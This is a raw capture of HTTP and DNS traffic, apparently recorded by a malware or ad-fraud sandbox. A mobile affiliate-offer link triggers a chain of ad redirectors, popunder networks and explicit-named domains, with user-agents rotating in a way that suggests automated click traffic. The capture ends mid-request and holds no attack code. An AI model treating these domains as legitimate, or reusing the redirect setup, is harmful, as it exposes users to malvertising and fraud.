GEThttp://mobileoffcpi.com/gooffer.php?aff_id=123&id_offer=3661&gaid=ef7b4b50-1669-49b1-b509-9575efac1576&may=94RequestGET /gooffer.php?aff_id=123&id_offer=3661&gaid=ef7b4b50-1669-49b1-b509-9575efac1576&may=94 HTTP/1.1
Host: mobileoffcpi.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 9; CLT-L29 Build/HUAWEICLT-L29) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/86.0.4240.198 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
X-Requested-With: com.android.chrome
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:53:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Encoding: gzip
-
GEThttp://mobileoffcpi.com/favicon.icoRequestGET /favicon.ico HTTP/1.1
Host: mobileoffcpi.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Linux; Android 9; CLT-L29 Build/HUAWEICLT-L29) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/86.0.4240.198 Mobile Safari/537.36
Accept: image/webp,image/apng,image/*,*/*;q=0.8
X-Requested-With: com.android.chrome
Referer: http://mobileoffcpi.com/gooffer.php?aff_id=123&id_offer=3661&gaid=ef7b4b50-1669-49b1-b509-9575efac1576&may=94
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:53:37 GMT
Content-Type: image/x-icon
Content-Length: 1150
Last-Modified: Fri, 15 Jun 2018 14:42:42 GMT
Connection: keep-alive
ETag: "5b23d062-47e"
Expires: Wed, 06 Oct 2021 09:53:37 GMT
Cache-Control: max-age=2592000
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Accept-Ranges: bytes
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49
-
DNSjs.wpadmngr.comRequestjs.wpadmngr.comIN AResponsejs.wpadmngr.comIN CNAMEcdn28786515.ahacdn.mecdn28786515.ahacdn.meIN A213.174.135.24cdn28786515.ahacdn.meIN A213.174.135.25
-
DNSp123.xyzRequestp123.xyzIN AResponsep123.xyzIN A2.57.89.186
-
DNSgamesnews.usRequestgamesnews.usIN AResponsegamesnews.usIN A207.180.237.38
-
DNShubtube.ruRequesthubtube.ruIN AResponsehubtube.ruIN A167.86.103.60
-
GEThttp://alfad.pro/go/266933/627550RequestGET /go/266933/627550 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:53:39 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 272
Connection: keep-alive
-
GEThttp://gamesnews.us/index.htmlRequestGET /index.html HTTP/1.1
Host: gamesnews.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:53:38 GMT
Content-Type: text/html
Content-Length: 264
Last-Modified: Sat, 28 Aug 2021 01:43:01 GMT
Connection: keep-alive
ETag: "612994a5-108"
Accept-Ranges: bytes
-
GEThttp://hubtube.ru/adv.phpRequestGET /adv.php HTTP/1.1
Host: hubtube.ru
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:53:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
DNSsearchengineads.netRequestsearchengineads.netIN AResponsesearchengineads.netIN A103.63.108.18
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49
-
GEThttp://alfad.pro/go/266933/628718RequestGET /go/266933/628718 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/537.86.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:53:44 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 271
Connection: keep-alive
-
GEThttp://alfad.pro/ad/ad?p=266933&w=627611&t=9ff90990d7d6c8c2&r=&vw=887&vh=537RequestGET /ad/ad?p=266933&w=627611&t=9ff90990d7d6c8c2&r=&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/58.0 IceDragon/58.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/627611
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 303 See Other
Date: Mon, 06 Sep 2021 09:53:44 GMT
Location: https://m1.firon.xyz/?s1=0&utm_campaign=Remnantnewtest&utm_medium=c8c78a53dcf735c1c683d5fc856523882fab7c4c
Server: nginx
Content-Length: 0
Connection: keep-alive
-
DNS51789.ruRequest51789.ruIN AResponse51789.ruIN A212.107.18.203
-
GEThttp://alfad.pro/go/266933/622591RequestGET /go/266933/622591 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:53:44 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 270
Connection: keep-alive
-
DNSjavhub.vipRequestjavhub.vipIN AResponsejavhub.vipIN A207.180.237.38
-
DNSbefuck.ruRequestbefuck.ruIN AResponsebefuck.ruIN A167.86.103.60
-
GEThttp://javhub.vip/goads.htmlRequestGET /goads.html HTTP/1.1
Host: javhub.vip
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:53:44 GMT
Content-Type: text/html
Content-Length: 270
Last-Modified: Thu, 25 Mar 2021 04:42:34 GMT
Connection: keep-alive
ETag: "605c14ba-10e"
Accept-Ranges: bytes
-
DNSjptube.usRequestjptube.usIN AResponsejptube.usIN A167.86.121.34
-
GEThttp://jptube.us/index.htmlRequestGET /index.html HTTP/1.1
Host: jptube.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:53:44 GMT
Content-Type: text/html
Content-Length: 265
Last-Modified: Tue, 22 Jun 2021 05:10:57 GMT
Connection: keep-alive
ETag: "60d170e1-109"
Accept-Ranges: bytes
-
DNSwww.fpcpopunder.comRequestwww.fpcpopunder.comIN AResponsewww.fpcpopunder.comIN CNAMEfpcpopunder.comfpcpopunder.comIN A66.154.95.74
-
DNSfuckteen.xyzRequestfuckteen.xyzIN AResponsefuckteen.xyzIN A207.180.237.38
-
DNS789ff.ruRequest789ff.ruIN AResponse789ff.ruIN A172.67.176.50789ff.ruIN A104.21.31.100
-
DNSshoppinghouse.usRequestshoppinghouse.usIN AResponseshoppinghouse.usIN A207.180.237.38
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160
-
GEThttp://fuckteen.xyz/goads.phpRequestGET /goads.php HTTP/1.1
Host: fuckteen.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; EIE10;ENUSMSE; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:53:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
DNSyesww.pwRequestyesww.pwIN AResponseyesww.pwIN A212.107.18.203
-
DNShornytit.usRequesthornytit.usIN AResponsehornytit.usIN A207.180.237.38
-
DNSlthampio.topRequestlthampio.topIN AResponselthampio.topIN A65.9.73.24lthampio.topIN A65.9.73.51lthampio.topIN A65.9.73.27lthampio.topIN A65.9.73.111
-
DNSrecaptcha.netRequestrecaptcha.netIN AResponserecaptcha.netIN A216.58.208.99
-
GEThttp://shoppinghouse.us/index.htmlRequestGET /index.html HTTP/1.1
Host: shoppinghouse.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:53:44 GMT
Content-Type: text/html
Content-Length: 264
Last-Modified: Wed, 01 Sep 2021 09:43:27 GMT
Connection: keep-alive
ETag: "612f4b3f-108"
Accept-Ranges: bytes
-
DNSretributionsaloon.xyzRequestretributionsaloon.xyzIN AResponseretributionsaloon.xyzIN A34.196.13.28
-
DNSweightlose.twRequestweightlose.twIN AResponseweightlose.twIN A207.180.237.38
-
DNSsexy8.xnxxn.ruRequestsexy8.xnxxn.ruIN AResponsesexy8.xnxxn.ruIN A2.57.89.186
-
GEThttp://alfad.pro/go/266933/622935RequestGET /go/266933/622935 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:53:44 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 272
Connection: keep-alive
-
GEThttp://retributionsaloon.xyz/RequestGET / HTTP/1.1
Host: retributionsaloon.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:53:44 GMT
Content-Type: text/html
Content-Length: 928
Connection: close
Expires: Mon, 31 Dec 2001 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-store, no-cache, pre-check=0, post-check=0
X-Content-Type-Options: nosniff
-
GEThttp://xmom.us/index.htmlRequestGET /index.html HTTP/1.1
Host: xmom.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:53:44 GMT
Content-Type: text/html
Content-Length: 270
Last-Modified: Wed, 01 Sep 2021 06:08:42 GMT
Connection: keep-alive
ETag: "612f18ea-10e"
Accept-Ranges: bytes
-
GEThttp://hornytit.us/index.htmlRequestGET /index.html HTTP/1.1
Host: hornytit.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; SM-J700F Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/68.0.3440.91 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/185.0.0.39.72;]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:53:44 GMT
Content-Type: text/html
Content-Length: 232
Last-Modified: Mon, 30 Aug 2021 09:28:22 GMT
Connection: keep-alive
ETag: "612ca4b6-e8"
Accept-Ranges: bytes
-
GEThttp://weightlose.tw/index.htmlRequestGET /index.html HTTP/1.1
Host: weightlose.tw
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/43.0.2357.61 Mobile/12H321 Safari/600.1.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:53:44 GMT
Content-Type: text/html
Content-Length: 313
Last-Modified: Thu, 24 Jun 2021 01:36:35 GMT
Connection: keep-alive
ETag: "60d3e1a3-139"
Accept-Ranges: bytes
-
GEThttp://789ff.ru/adv.phpRequestGET /adv.php HTTP/1.1
Host: 789ff.ru
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:53:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.3.23
cache-control: public, max-age=180
expires: Mon, 06 Sep 2021 09:56:44 GMT
vary: Accept-Encoding
x-turbo-charged-by: LiteSpeed
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SB%2BGRzgK%2BrqW7sH6x63HJsmufEGD2YQb9rg61abhn9xcvN3YX8aLaa3NP6CoFMERGEkX3i%2FGJzYtdi1HMStwda13MpOrrrYKJ1FkpXQuyfK73WQzgQAUJC3LFg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6cfda6bce4c74-AMS
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
-
GEThttp://lthampio.top/redirect?tid=917725RequestGET /redirect?tid=917725 HTTP/1.1
Host: lthampio.top
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://befuck.ru/ad.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 302 Found
Content-Type: text/plain
Content-Length: 0
Connection: keep-alive
Date: Mon, 06 Sep 2021 09:53:44 GMT
Server: openresty/1.17.8.2
cache-control: no-store, no-cache, must-revalidate, no-transform
Pragma: no-cache
P3P: CP="NID DSP ALL COR"
set-cookie: csu=c460ee3b-e8d6-48ae-a288-e64ce362bcf7
Location: https://xml.bid-engine.com/click?i=0RhcChoQF7k_0
X-Cache: Miss from cloudfront
Via: 1.1 254622ebfed5feb6e2d8380b3f9c4c10.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS1-C1
X-Amz-Cf-Id: esTQ8gv6nzp0Vtr1sdnh0tcfTegMzuRbF4jnvjbzq3vSYHtNgEOZIA==
-
GEThttp://befuck.ru/ad.phpRequestGET /ad.php HTTP/1.1
Host: befuck.ru
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:53:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
DNS115.t.keepitpumpin.ioRequest115.t.keepitpumpin.ioIN AResponse115.t.keepitpumpin.ioIN A212.83.166.214
-
DNSfeed.lookbox.netRequestfeed.lookbox.netIN AResponsefeed.lookbox.netIN A172.67.164.57feed.lookbox.netIN A104.21.15.206
-
DNSfeed.lookbox.netRequestfeed.lookbox.netIN AResponsefeed.lookbox.netIN A172.67.164.57feed.lookbox.netIN A104.21.15.206
-
DNSmaoss.infoRequestmaoss.infoIN AResponsemaoss.infoIN A5.181.218.143
-
DNSmillustry.topRequestmillustry.topIN AResponsemillustry.topIN A13.227.222.102millustry.topIN A13.227.222.110millustry.topIN A13.227.222.73millustry.topIN A13.227.222.89
-
DNSonsanothi.bizRequestonsanothi.bizIN AResponseonsanothi.bizIN A52.222.139.9onsanothi.bizIN A52.222.139.93onsanothi.bizIN A52.222.139.29onsanothi.bizIN A52.222.139.108
-
GEThttp://millustry.top/redirect?tid=936476RequestGET /redirect?tid=936476 HTTP/1.1
Host: millustry.top
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MATBJS; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://morenews.us/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: csu=c782ee4f-d54c-4e09-8c2d-3818eb2972d0
ResponseHTTP/1.1 302 Found
Content-Type: text/plain
Content-Length: 0
Connection: keep-alive
Date: Mon, 06 Sep 2021 09:53:50 GMT
Server: openresty/1.17.8.2
cache-control: no-store, no-cache, must-revalidate, no-transform
Pragma: no-cache
P3P: CP="NID DSP ALL COR"
Location: https://rotabol.com/d/2109060453dcec1d47f5ab4f49b8a9f24132/145/uUbxdNV8syBiYX-JIhKEckarFBsKrQMkwDrvCqaN8pmeSyPlo1DaAAYN_uM_pKrPYYIgkAcFJDNJgaEcd7ax2Z3yPV53vslolJWRndRyy2dbh9UoHErZmCTgwch-AgbMaz6gISFL-7Ta3Mn4695q-vXX9qZH6fVHRG_t2j2dn8z_5eO2QN7dv5eW_YCc0ogCEOAj0KqFHdTHao_S8Np8IfDFG1xZsf_bA_eLmeChrJGdoStzc4ReuahlAF0B60mw_WC8cp0EeRkhYAb20e9UxxNaR6mflN0KuGQnuEAlBHqYWZZqMegLJu1Sh47sFNXYDNg9Ev_Ssrapxvrzvy2wmaMkAwNcNuLNSxUGHpYb92jpwY0eqhDTMOgpNMv_y36LAzC7F0DXfnUJ03upFjyKrJJFkxbEFVfBEPck8N5uJ2pb0tuvQKq3WM0Pc7EnXkA5p62JgwWeTnedmL8yYB1-V7I9-Og4BIZwH7DAwDFgfd2rbwgmDKFpJof1sGeznfGIH8eZevk2NK6svICnPXxGs8V77clqECFLY2lQ8aRD1XANmpqZkx6UEjW6glljnJH2kRAR6P1qhrs-im0tQDv5kJcH8o1sC_FjOQ8elgTzXt9B7pVmNebXYmOk98LMAFatm3aEPOqc6TjehKFnEJzEb0tEe0UYOmYbkMItMX0gcqI6q2zz5JrlScs7lOjyvZq0ndJogDgwOTxZ4_xHvFrsrXLWU9dCEYmq8oQJ9j3E6Jpi8ghOuSIRsGJklRZIY3a4tXafUb1vzh1LNI4timIgG3iHhRH_keyNqF2Rwm6A0bgZB6wQtS1Oa3mvMUXiJ5Va9JLlNDb1aM0OhvcuPD66SPPiv8WuWzADHi3OUiJDYFvv91iRtZXkgjToeiUqp7bSzqmT8-Y1gOg-RXgrq42Pq-7NypNzyQscqqaoi1TL0oqFFJxX5Vy_O66UNmzPHKhHKxvX-c4btQGZRWF2kOEfboY-tQn1u_ckZjzE0wuelJ8wcKFwFr_FUuKCBehLeJyjMTPM0H2NEJiW6eFzbrx4h1qjaiVUfp0=
X-Cache: Miss from cloudfront
Via: 1.1 25fe70cc18ad9b2503949e3460083641.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS54-C1
X-Amz-Cf-Id: 6zX3BH81WQ5UcX-7oxdNZsBEFUrHu9NmRFjL_yyaifBVlc6Acvw1Og==
-
GEThttp://onsanothi.biz/redirect?tid=928662RequestGET /redirect?tid=928662 HTTP/1.1
Host: onsanothi.biz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.65 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://jpteen.us/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 302 Found
Content-Type: text/plain
Content-Length: 0
Connection: keep-alive
Date: Mon, 06 Sep 2021 09:53:50 GMT
Server: openresty/1.17.8.2
cache-control: no-store, no-cache, must-revalidate, no-transform
Pragma: no-cache
P3P: CP="NID DSP ALL COR"
set-cookie: csu=f0536568-01f6-47b0-9a2b-de75a597789d
Location: https://xml.bid-engine.com/click?i=vuBzLX9ui7g_0
X-Cache: Miss from cloudfront
Via: 1.1 c8398cf797b03d1d2d2deda33fe571f1.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS50-C1
X-Amz-Cf-Id: TJRkUAL2NZUYzE0p8WzOTJ41Cypu24c__yHml1MGPUeS6FZxQlDjMg==
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49
-
GEThttp://alfad.pro/go/266933/627547RequestGET /go/266933/627547 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 OPR/57.0.3098.106
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:53:50 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 272
Connection: keep-alive
-
GEThttp://alfad.pro/ad/ad?p=266933&w=628701&t=13c07405e3442876&r=&vw=887&vh=537RequestGET /ad/ad?p=266933&w=628701&t=13c07405e3442876&r=&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.168 Safari/537.36 OPR/51.0.2830.40
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/628701
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 303 See Other
Date: Mon, 06 Sep 2021 09:53:50 GMT
Location: https://m1.firon.xyz/?s1=0&utm_campaign=Remnantnewtest&utm_medium=c8c78a53dcf735c1c683d5fc856523882fab7c4c
Server: nginx
Content-Length: 0
Connection: keep-alive
-
DNSpornhub.bidRequestpornhub.bidIN AResponsepornhub.bidIN A207.180.237.38
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49
-
GEThttp://pornhub.bid/adv.phpRequestGET /adv.php HTTP/1.1
Host: pornhub.bid
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
